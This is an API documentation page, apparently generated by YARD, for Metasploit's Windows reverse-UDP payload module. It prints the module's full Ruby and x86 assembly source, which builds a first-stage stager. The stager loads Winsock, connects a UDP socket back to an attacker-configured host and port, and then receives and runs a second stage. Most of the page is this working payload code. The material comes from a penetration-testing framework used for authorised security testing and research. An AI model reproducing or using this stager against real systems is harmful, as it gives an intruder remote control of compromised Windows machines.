Module: Msf::Payload::Windows::ReverseUdp
- Includes:
- TransportConfig, ReverseTcp
- Defined in:
- lib/msf/core/payload/windows/reverse_udp.rb
Overview
Complex reverse_udp payload generation for Windows ARCH_X86
Constant Summary
Constants included from Rex::Payloads::Meterpreter::UriChecksum
Rex::Payloads::Meterpreter::UriChecksum::URI_CHECKSUM_CONN, Rex::Payloads::Meterpreter::UriChecksum::URI_CHECKSUM_CONN_MAX_LEN, Rex::Payloads::Meterpreter::UriChecksum::URI_CHECKSUM_INITJ, Rex::Payloads::Meterpreter::UriChecksum::URI_CHECKSUM_INITN, Rex::Payloads::Meterpreter::UriChecksum::URI_CHECKSUM_INITP, Rex::Payloads::Meterpreter::UriChecksum::URI_CHECKSUM_INITW, Rex::Payloads::Meterpreter::UriChecksum::URI_CHECKSUM_INIT_CONN, Rex::Payloads::Meterpreter::UriChecksum::URI_CHECKSUM_MIN_LEN, Rex::Payloads::Meterpreter::UriChecksum::URI_CHECKSUM_MODES, Rex::Payloads::Meterpreter::UriChecksum::URI_CHECKSUM_UUID_MIN_LEN
Instance Method Summary collapse
-
#asm_reverse_udp(opts = {}) ⇒ Object
Generate an assembly stub with the configured feature set and options.
- #asm_send_newline ⇒ Object
-
#generate(_opts = {}) ⇒ Object
Generate the first stage.
-
#generate_reverse_udp(opts = {}) ⇒ Object
Generate and compile the stager.
- #transport_config(opts = {}) ⇒ Object
Methods included from ReverseTcp
#asm_block_recv, #asm_reverse_tcp, #generate_reverse_tcp, #include_send_uuid, #initialize, #required_space
Methods included from Exitfunk
Methods included from BlockApi
Methods included from SendUUID
#asm_send_uuid, #uuid_required_size
Methods included from Msf::Payload::Windows
#apply_prepends, exit_types, #handle_intermediate_stage, #include_send_uuid, #initialize, #replace_var
Methods included from PrependMigrate
#apply_prepend_migrate, #initialize, #prepend_migrate, #prepend_migrate?, #prepend_migrate_64
Methods included from TransportConfig
#transport_config_bind_named_pipe, #transport_config_bind_tcp, #transport_config_reverse_http, #transport_config_reverse_https, #transport_config_reverse_ipv6_tcp, #transport_config_reverse_named_pipe, #transport_config_reverse_tcp, #transport_config_reverse_udp, #transport_uri_components
Methods included from UUID::Options
#generate_payload_uuid, #generate_uri_uuid_mode, #initialize, #record_payload_uuid, #record_payload_uuid_url
Methods included from Rex::Payloads::Meterpreter::UriChecksum
#generate_uri_checksum, #generate_uri_uuid, #process_uri_resource, #uri_checksum_lookup
Methods included from Pingback::Options
Instance Method Details
#asm_reverse_udp(opts = {}) ⇒ Object
Generate an assembly stub with the configured feature set and options.
63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 |
# File 'lib/msf/core/payload/windows/reverse_udp.rb', line 63 def asm_reverse_udp(opts={}) retry_count = [opts[:retry_count].to_i, 1].max encoded_port = "0x%.8x" % [opts[:port].to_i,2].pack("vn").unpack("N").first encoded_host = "0x%.8x" % Rex::Socket.addr_aton(opts[:host]||"127.127.127.127").unpack("V").first asm = %Q^ ; Input: EBP must be the address of 'api_call'. ; Output: EDI will be the socket for the connection to the server ; Clobbers: EAX, ESI, EDI, ESP will also be modified (-0x1A0) reverse_udp: push '32' ; Push the bytes 'ws2_32',0,0 onto the stack. push 'ws2_' ; ... push esp ; Push a pointer to the "ws2_32" string on the stack. push #{Rex::Text.block_api_hash('kernel32.dll', 'LoadLibraryA')} call ebp ; LoadLibraryA( "ws2_32" ) mov eax, 0x0190 ; EAX = sizeof( struct WSAData ) sub esp, eax ; alloc some space for the WSAData structure push esp ; push a pointer to this stuct push eax ; push the wVersionRequested parameter push #{Rex::Text.block_api_hash('ws2_32.dll', 'WSAStartup')} call ebp ; WSAStartup( 0x0190, &WSAData ); set_address: push #{retry_count} ; retry counter create_socket: push #{encoded_host} ; host in little-endian format - #{opts[:host]} push #{encoded_port} ; family AF_INET and port number - #{opts[:port]} mov esi, esp ; save pointer to sockaddr struct push eax ; if we succeed, eax will be zero, push zero for the flags param. push eax ; push null for reserved parameter push eax ; we do not specify a WSAPROTOCOL_INFO structure push eax ; we do not specify a protocol inc eax ; inc eax ; push eax ; push SOCK_DGRAM (UDP socket) push eax ; push AF_INET push #{Rex::Text.block_api_hash('ws2_32.dll', 'WSASocketA')} call ebp ; WSASocketA( AF_INET, SOCK_DGRAM, 0, 0, 0, 0 ); xchg edi, eax ; save the socket for later, don't care about the value of eax after this try_connect: push 16 ; length of the sockaddr struct push esi ; pointer to the sockaddr struct push edi ; the socket push #{Rex::Text.block_api_hash('ws2_32.dll', 'connect')} call ebp ; connect( s, &sockaddr, 16 ); test eax,eax ; non-zero means a failure jz connected handle_connect_failure: ; decrement our attempt count and try again dec [esi+8] jnz try_connect ^ if opts[:exitfunk] asm << %Q^ failure: call exitfunk ^ else asm << %Q^ failure: push 0x56A2B5F0 ; hardcoded to exitprocess for size call ebp ^ end asm << %Q^ ; this lable is required so that reconnect attempts include ; the UUID stuff if required. connected: ^ # UDP receivers need to read something from the new socket if include_send_uuid asm << asm_send_uuid else asm << asm_send_newline end asm end |
#asm_send_newline ⇒ Object
153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 |
# File 'lib/msf/core/payload/windows/reverse_udp.rb', line 153 def asm_send_newline newline = raw_to_db "\n" asm =%Q^ send_newline: push 0 ; flags push #{newline.length} ; length of the newline call get_nl_address ; put newline buffer on the stack db #{newline} ; newline get_nl_address: push edi ; saved socket push #{Rex::Text.block_api_hash('ws2_32.dll', 'send')} call ebp ; call send ^ asm end |
#generate(_opts = {}) ⇒ Object
Generate the first stage
19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 |
# File 'lib/msf/core/payload/windows/reverse_udp.rb', line 19 def generate(_opts = {}) conf = { port: datastore['LPORT'], host: datastore['LHOST'], retry_count: datastore['ReverseConnectRetries'], reliable: false } # Generate the advanced stager if we have space if self.available_space && cached_size && required_space <= self.available_space conf[:exitfunk] = datastore['EXITFUNC'] conf[:reliable] = true end generate_reverse_udp(conf) end |
#generate_reverse_udp(opts = {}) ⇒ Object
Generate and compile the stager
43 44 45 46 47 48 49 50 51 52 53 54 |
# File 'lib/msf/core/payload/windows/reverse_udp.rb', line 43 def generate_reverse_udp(opts={}) combined_asm = %Q^ cld ; Clear the direction flag. call start ; Call start, this pushes the address of 'api_call' onto the stack. #{asm_block_api} start: pop ebp #{asm_reverse_udp(opts)} #{asm_block_recv(opts)} ^ Metasm::Shellcode.assemble(Metasm::X86.new, combined_asm).encode_string end |
#transport_config(opts = {}) ⇒ Object
36 37 38 |
# File 'lib/msf/core/payload/windows/reverse_udp.rb', line 36 def transport_config(opts={}) transport_config_reverse_udp(opts) end |